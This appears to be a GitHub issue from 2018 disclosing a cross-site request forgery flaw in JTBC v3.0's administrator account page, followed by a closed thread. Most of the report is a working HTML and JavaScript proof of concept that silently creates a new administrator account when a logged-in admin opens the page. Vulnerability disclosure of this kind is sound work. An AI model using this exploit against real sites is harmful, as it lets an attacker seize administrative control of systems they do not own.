
There is CSRF vulnerability that can add the administrator account #4

Eth4nHunt opened this Issue Sep 18, 2018 · 1 comment



Eth4nHunt commented Sep 18, 2018

/console/account/manage.php?type=action&action=add in JTBC v3.0(C) has CSRF. After the administrator has logged in, opening the CSRF exploit page will add an administrator.
CSRF exploit:

```html
<title>test csrf</title>
<script type="text/javascript">
var url = "http://x.x.x.x/phpjtbc/console/account/manage.php?type=action&action=add";
var postStr = 'username=testcsrf&password=123456&cpassword=123456&role=-1&';
var ajax = null;
if (window.XMLHttpRequest) {
    ajax = new XMLHttpRequest();
} else if (window.ActiveXObject) {
    ajax = new ActiveXObject("Microsoft.XMLHTTP");
} else {
    ajax = null;
}
ajax.open("POST", url, false); // the pasted text had lost the "ajax.open(" call
ajax.withCredentials = true;   // browser attaches the logged-in admin's cookies
ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=utf-8");
ajax.send(postStr);
</script>
```


jetiben commented Sep 20, 2018


@jetiben jetiben closed this Sep 20, 2018
